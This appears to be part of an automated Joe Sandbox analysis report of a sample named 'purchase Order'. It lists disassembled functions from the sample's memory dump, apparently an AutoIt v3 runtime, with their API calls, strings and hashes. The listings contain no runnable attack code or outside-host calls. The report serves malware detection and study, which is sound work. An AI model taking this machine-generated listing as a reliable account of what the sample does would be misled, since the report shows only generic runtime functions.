Opcode ID: 047387e58b3bf9f90696955c9ee48e98b79dec5fee996cd70274f082f11864fc
Instruction ID: 555d80a7d17eb989ec9d7d64e1c03107e96fc922379eabf943d8349c91a6c8bd
Opcode Fuzzy Hash: 047387e58b3bf9f90696955c9ee48e98b79dec5fee996cd70274f082f11864fc
Instruction Fuzzy Hash: D9C1A3742042168BCB08EF10C551A7F77A5AF96348F084859F9969B3E2DB30EE4ADB46

Function 00CAB6C4 Relevance: 40.6, APIs: 21, Strings: 2, Instructions: 400windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00CAB7B0
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00CAB7C1
CharNextW.USER32(0000014E), ref: 00CAB7F0
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00CAB831
SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00CAB847
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00CAB858
SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00CAB875
SetWindowTextW.USER32(?,0000014E), ref: 00CAB8C7
SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00CAB8DD
SendMessageW.USER32(?,00001002,00000000,?), ref: 00CAB90E
_memset.LIBCMT ref: 00CAB933
SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00CAB97C
_memset.LIBCMT ref: 00CAB9DB
SendMessageW.USER32 ref: 00CABA05
SendMessageW.USER32(?,00001074,?,00000001), ref: 00CABA5D
SendMessageW.USER32(?,0000133D,?,?), ref: 00CABB0A
InvalidateRect.USER32(?,00000000,00000001), ref: 00CABB2C
GetMenuItemInfoW.USER32(?), ref: 00CABB76
SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00CABBA3
DrawMenuBar.USER32(?), ref: 00CABBB2
SetWindowTextW.USER32(?,0000014E), ref: 00CABBDA

Strings

@U=u, xrefs: 00CAB7B0, 00CAB7C1, 00CAB7F6, 00CAB875, 00CAB8DD, 00CAB90E, 00CAB97C, 00CABA05, 00CABA5D, 00CABB0A
0, xrefs: 00CABB4F

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
String ID: 0$@U=u
API String ID: 1073566785-975001249
Opcode ID: 606bbfa043a76650532f2bd0de4231ec252b627a6e33f40c5a16d8caaa264876
Instruction ID: da71a14b736b0d45570c3ce94f6764670d3e81b5fa8d9af602e19a393a218a2f
Opcode Fuzzy Hash: 606bbfa043a76650532f2bd0de4231ec252b627a6e33f40c5a16d8caaa264876
Instruction Fuzzy Hash: 91E1907590021AABDB20DF65CC84FEE7B78FF06718F10815AF929AA192D7718E41DF60

Function 00CA764F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00CA778A
GetDesktopWindow.USER32 ref: 00CA779F
GetWindowRect.USER32(00000000), ref: 00CA77A6
GetWindowLongW.USER32(?,000000F0), ref: 00CA7808
DestroyWindow.USER32(?), ref: 00CA7834
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00CA785D
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00CA787B
SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00CA78A1
SendMessageW.USER32(?,00000421,?,?), ref: 00CA78B6
SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00CA78C9
IsWindowVisible.USER32(?), ref: 00CA78E9
SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00CA7904
SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00CA7918
GetWindowRect.USER32(?,?), ref: 00CA7930
MonitorFromPoint.USER32(?,?,00000002), ref: 00CA7956
GetMonitorInfoW.USER32 ref: 00CA7970
CopyRect.USER32(?,?), ref: 00CA7987
SendMessageW.USER32(?,00000412,00000000), ref: 00CA79F2

Strings

0, xrefs: 00CA7735
(, xrefs: 00CA7965
tooltips_class32, xrefs: 00CA7856

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: 06e2753b4652c4eae1e115ba917396e15d201583821e6f9a3326a9faed735e31
Instruction ID: ae645ce4d99a66c8c49e6995a512f6ac96b9f266dd43309f9bd82038bd787af4
Opcode Fuzzy Hash: 06e2753b4652c4eae1e115ba917396e15d201583821e6f9a3326a9faed735e31
Instruction Fuzzy Hash: 42B18B71608301AFDB04DF64C948B6EBBE4FF89314F008A1DF59A9B291DB70E945CB92

Function 00C86CE9 Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 178COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,?), ref: 00C86CFB
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00C86D21
_wcscpy.LIBCMT ref: 00C86D4F
_wcscmp.LIBCMT ref: 00C86D5A
_wcscat.LIBCMT ref: 00C86D70
_wcsstr.LIBCMT ref: 00C86D7B
VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00C86D97
_wcscat.LIBCMT ref: 00C86DE0
_wcscat.LIBCMT ref: 00C86DE7
_wcsncpy.LIBCMT ref: 00C86E12

Strings

%u.%u.%u.%u, xrefs: 00C86E75
04090000, xrefs: 00C86DCD
StringFileInfo\, xrefs: 00C86D6A
\VarFileInfo\Translation, xrefs: 00C86D8F
DefaultLangCodepage, xrefs: 00C86DFA

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 699586101-1459072770
Opcode ID: 20ee47359409fa81902477d863c6cd56561e513c2ee16a1e91123d91e0036201
Instruction ID: 274cd59dd8013c008d5d2e0f9ff47ed13467793071f6497f7ada98779112a6df
Opcode Fuzzy Hash: 20ee47359409fa81902477d863c6cd56561e513c2ee16a1e91123d91e0036201
Instruction Fuzzy Hash: 6841E771A00204BBE711BB64CD87EBF777CEF41714F14003AFA01A2192FB749A01A7A6

Function 00C5A856 Relevance: 35.3, APIs: 18, Strings: 2, Instructions: 285windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00C5A939
GetSystemMetrics.USER32(00000007), ref: 00C5A941
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00C5A96C
GetSystemMetrics.USER32(00000008), ref: 00C5A974
GetSystemMetrics.USER32(00000004), ref: 00C5A999
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00C5A9B6
AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 00C5A9C6
CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00C5A9F9
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00C5AA0D
GetClientRect.USER32(00000000,000000FF), ref: 00C5AA2B
GetStockObject.GDI32(00000011), ref: 00C5AA47
SendMessageW.USER32(00000000,00000030,00000000), ref: 00C5AA52

Part of subcall function 00C5B63C: GetCursorPos.USER32(000000FF), ref: 00C5B64F
Part of subcall function 00C5B63C: ScreenToClient.USER32(00000000,000000FF), ref: 00C5B66C
Part of subcall function 00C5B63C: GetAsyncKeyState.USER32(00000001), ref: 00C5B691
Part of subcall function 00C5B63C: GetAsyncKeyState.USER32(00000002), ref: 00C5B69F

SetTimer.USER32(00000000,00000000,00000028,00C5AB87), ref: 00C5AA79

Strings

AutoIt v3 GUI, xrefs: 00C5A9F1
@U=u, xrefs: 00C5AA52

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: @U=u$AutoIt v3 GUI
API String ID: 1458621304-2077007950
Opcode ID: 512df4e780396b3d66109ca128774cd4b83464e411dbd840a9b951da70a8ff8e
Instruction ID: 08daeff111b3ec025aed4834c72c0be597b7a42674578c58731c32ab03bfc290
Opcode Fuzzy Hash: 512df4e780396b3d66109ca128774cd4b83464e411dbd840a9b951da70a8ff8e
Instruction Fuzzy Hash: 4CB18C79A0020A9FDB14DFA9CC45BEE7BB4FB08315F114229FA16E7290DB70D980DB55

Function 00C7EA9D Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 168windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 00C7EAB0
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00C7EAC2
SetWindowTextW.USER32(?,?), ref: 00C7EAD9
GetDlgItem.USER32(?,000003EA), ref: 00C7EAEE
SetWindowTextW.USER32(00000000,?), ref: 00C7EAF4
GetDlgItem.USER32(?,000003E9), ref: 00C7EB04
SetWindowTextW.USER32(00000000,?), ref: 00C7EB0A
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00C7EB2B
SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00C7EB45
GetWindowRect.USER32(?,?), ref: 00C7EB4E
SetWindowTextW.USER32(?,?), ref: 00C7EBB9
GetDesktopWindow.USER32 ref: 00C7EBBF
GetWindowRect.USER32(00000000), ref: 00C7EBC6
MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 00C7EC12
GetClientRect.USER32(?,?), ref: 00C7EC1F
PostMessageW.USER32(?,00000005,00000000,00000000), ref: 00C7EC44
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00C7EC6F

Strings

@U=u, xrefs: 00C7EAC2

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
String ID: @U=u
API String ID: 3869813825-2594219639
Opcode ID: 4ec89e722f6dd367302650737fdf8c2839afc85f98f06b0f7fe7e1319fcfbba7
Instruction ID: a1d870ea9aec5828ce41aa0c86000ceb92c1f4d91e4b79449d50b0a4406a9d40
Opcode Fuzzy Hash: 4ec89e722f6dd367302650737fdf8c2839afc85f98f06b0f7fe7e1319fcfbba7
Instruction Fuzzy Hash: 95513D71900709AFDB20DFA8CD89F6EBBF5FF08704F008968E597A26A0C774A944DB10

Function 00C42EC0 Relevance: 30.1, APIs: 8, Strings: 9, Instructions: 346COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00C42F7A
IsWindow.USER32(?), ref: 00CB22FD

Strings

HANDLE, xrefs: 00CB20E2
LAST, xrefs: 00CB20B6
REGEXPCLASS, xrefs: 00CB2149
REGEXPTITLE, xrefs: 00CB20F8
CLASS, xrefs: 00CB2128
ALL, xrefs: 00CB2264
INSTANCE, xrefs: 00CB223C
TITLE, xrefs: 00CB2292
ACTIVE, xrefs: 00CB20CC

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: Window$Foreground
String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
API String ID: 62970417-1919597938
Opcode ID: e3f93af12d021f2beda68af418f8afcfca7295b9c5cbf473e1a326f30f07c0fa
Instruction ID: 89fd34236d21647bc3d563a4a3430180de1e73c6805c376b643dea27cc293c93
Opcode Fuzzy Hash: e3f93af12d021f2beda68af418f8afcfca7295b9c5cbf473e1a326f30f07c0fa
Instruction Fuzzy Hash: FDD1E9305083469BCB04EF51C481AEEBBB4FF54354F404A1DF8A6975A1DB30FA9ADB92

Function 00CA6BC9 Relevance: 28.3, APIs: 2, Strings: 14, Instructions: 281windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00CA6C56
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00CA6D16

Strings

GETTEXT, xrefs: 00CA6CBF
@U=u, xrefs: 00CA6D16
FINDITEM, xrefs: 00CA6E81
GETSELECTED, xrefs: 00CA6E3C
ISSELECTED, xrefs: 00CA6D21
SELECTINVERT, xrefs: 00CA6DDE
VIEWCHANGE, xrefs: 00CA6ECD
GETSUBITEMCOUNT, xrefs: 00CA6CA1
SELECTCLEAR, xrefs: 00CA6D8D
SELECT, xrefs: 00CA6DA8
GETSELECTEDCOUNT, xrefs: 00CA6CF9
SELECTALL, xrefs: 00CA6D75
DESELECT, xrefs: 00CA6DFC
GETITEMCOUNT, xrefs: 00CA6C84

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: @U=u$DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 3974292440-1753161424
Opcode ID: 9e9c38859e116fa5f30f2327bf8aab74bdaf3eebf5b69d7f8fe42ce4b2e19b63
Instruction ID: 6518a0920cbd2439f776b6b41cf047287b592f5c42ae77b38b36ef310b4805a9
Opcode Fuzzy Hash: 9e9c38859e116fa5f30f2327bf8aab74bdaf3eebf5b69d7f8fe42ce4b2e19b63
Instruction Fuzzy Hash: E8A18F342043469FCB18EF20C851A6AB3A5FF45358F14896CF9A65B3D2DB70EE0ADB41

Function 00CAE731 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 129filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 00CAE754
GetFileSize.KERNEL32(00000000,00000000), ref: 00CAE76B
GlobalAlloc.KERNEL32(00000002,00000000), ref: 00CAE776
CloseHandle.KERNEL32(00000000), ref: 00CAE783
GlobalLock.KERNEL32(00000000), ref: 00CAE78C
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00CAE79B
GlobalUnlock.KERNEL32(00000000), ref: 00CAE7A4
CloseHandle.KERNEL32(00000000), ref: 00CAE7AB
CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00CAE7BC
OleLoadPicture.OLEAUT32(?,00000000,00000000,00CCD9BC,?), ref: 00CAE7D5
GlobalFree.KERNEL32(00000000), ref: 00CAE7E5
GetObjectW.GDI32(?,00000018,000000FF), ref: 00CAE809
CopyImage.USER32(?,00000000,?,?,00002000), ref: 00CAE834
DeleteObject.GDI32(00000000), ref: 00CAE85C
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00CAE872

Strings

@U=u, xrefs: 00CAE872

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID: @U=u
API String ID: 3840717409-2594219639
Opcode ID: 5a7df12866e06831797afbd5b5d6b90c94c38ff7d090f4eee3a2608a1322b44a
Instruction ID: 0b06ce8bf9861ee4270400bf668be17983e2625a686ada1a7b32b1ae1721f8d4
Opcode Fuzzy Hash: 5a7df12866e06831797afbd5b5d6b90c94c38ff7d090f4eee3a2608a1322b44a
Instruction Fuzzy Hash: 77412875600205EFDB119F65DC88FAEBBB8EF8A715F108068F916D72A0D734AE41DB60

Function 00CA3639 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00CA3735
RegCreateKeyExW.ADVAPI32(?,?,00000000,00CDDC00,00000000,?,00000000,?,?), ref: 00CA37A3
RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00CA37EB
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00CA3874
RegCloseKey.ADVAPI32(?), ref: 00CA3B94
RegCloseKey.ADVAPI32(00000000), ref: 00CA3BA1

Strings

REG_SZ, xrefs: 00CA38B2
REG_DWORD, xrefs: 00CA3A65
REG_EXPAND_SZ, xrefs: 00CA3811
REG_MULTI_SZ, xrefs: 00CA395C
REG_BINARY, xrefs: 00CA3B2F
REG_QWORD, xrefs: 00CA3AE2

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: Close$ConnectCreateRegistryValue
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 536824911-966354055
Opcode ID: ca1e0fdfba3d8c7742ad0c989bbc1ff62b1c6fa5cd4ae83f0db57cd3620ce032
Instruction ID: b490be67050e7a549a8a24ed40d7b7fc2ed4dd350508999ef5d361248e437726
Opcode Fuzzy Hash: ca1e0fdfba3d8c7742ad0c989bbc1ff62b1c6fa5cd4ae83f0db57cd3620ce032
Instruction Fuzzy Hash: B8026A752006119FCB14EF28C895A2EB7E5FF89724F04845DF99A9B3A1CB30EE41DB85

Function 00C7CF50 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 00C7CF91
__swprintf.LIBCMT ref: 00C7D032
_wcscmp.LIBCMT ref: 00C7D045
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00C7D09A
_wcscmp.LIBCMT ref: 00C7D0D6
GetClassNameW.USER32(?,?,00000400), ref: 00C7D10D
GetDlgCtrlID.USER32(?), ref: 00C7D15F
GetWindowRect.USER32(?,?), ref: 00C7D195
GetParent.USER32(?), ref: 00C7D1B3
ScreenToClient.USER32(00000000), ref: 00C7D1BA
GetClassNameW.USER32(?,?,00000100), ref: 00C7D234
_wcscmp.LIBCMT ref: 00C7D248
GetWindowTextW.USER32(?,?,00000400), ref: 00C7D26E
_wcscmp.LIBCMT ref: 00C7D282

Strings

%s%u, xrefs: 00C7D02C

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
String ID: %s%u
API String ID: 3119225716-679674701
Opcode ID: bc7593fcdabaed1917a06a86f4286d8f8ec636a5a7688ed760f8f03b49aec76a
Instruction ID: 079735b3dc1192f0c54ecadbec1bc6d90b84c671ad892af639398933bf812d45
Opcode Fuzzy Hash: bc7593fcdabaed1917a06a86f4286d8f8ec636a5a7688ed760f8f03b49aec76a
Instruction Fuzzy Hash: D1A1A171604306AFD715DF64C884FAAB7A8FF44354F048929F9AED2191EB30EE46CB91

Function 00C7D8A7 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(00000008,?,00000400), ref: 00C7D8EB
_wcscmp.LIBCMT ref: 00C7D8FC
GetWindowTextW.USER32(00000001,?,00000400), ref: 00C7D924
CharUpperBuffW.USER32(?,00000000), ref: 00C7D941
_wcscmp.LIBCMT ref: 00C7D95F
_wcsstr.LIBCMT ref: 00C7D970
GetClassNameW.USER32(00000018,?,00000400), ref: 00C7D9A8
_wcscmp.LIBCMT ref: 00C7D9B8
GetWindowTextW.USER32(00000002,?,00000400), ref: 00C7D9DF
GetClassNameW.USER32(00000018,?,00000400), ref: 00C7DA28
_wcscmp.LIBCMT ref: 00C7DA38
GetClassNameW.USER32(00000010,?,00000400), ref: 00C7DA60
GetWindowRect.USER32(00000004,?), ref: 00C7DAC9

Strings

ThumbnailClass, xrefs: 00C7D9B3, 00C7DA33
@, xrefs: 00C7D8C6

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
String ID: @$ThumbnailClass
API String ID: 1788623398-1539354611
Opcode ID: 8ad72ebaa8a54d9da29d34b861580c7221c3a621a22a8cc2404148eed31a2250
Instruction ID: 536ff3f091f5a699125e206e4bce954c1aa992801243eb71abf9121a2b46453c
Opcode Fuzzy Hash: 8ad72ebaa8a54d9da29d34b861580c7221c3a621a22a8cc2404148eed31a2250
Instruction Fuzzy Hash: AF819F310083059BDB11DF54C885FAA7BE8FF84714F08846AFD9E9A096DB30DE46DBA1

Function 00CACE58 Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 205windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00CACEFB
DestroyWindow.USER32(?,?), ref: 00CACF73
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00CACFF4
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00CAD016
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00CAD025
DestroyWindow.USER32(?), ref: 00CAD042
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00C40000,00000000), ref: 00CAD075
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00CAD094
GetDesktopWindow.USER32 ref: 00CAD0A9
GetWindowRect.USER32(00000000), ref: 00CAD0B0
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00CAD0C2
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00CAD0DA

Part of subcall function 00C5B526: GetWindowLongW.USER32(?,000000EB), ref: 00C5B537

Strings

@U=u, xrefs: 00CACFA7, 00CAD081
tooltips_class32, xrefs: 00CACFED, 00CAD06E
0, xrefs: 00CACF1B

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
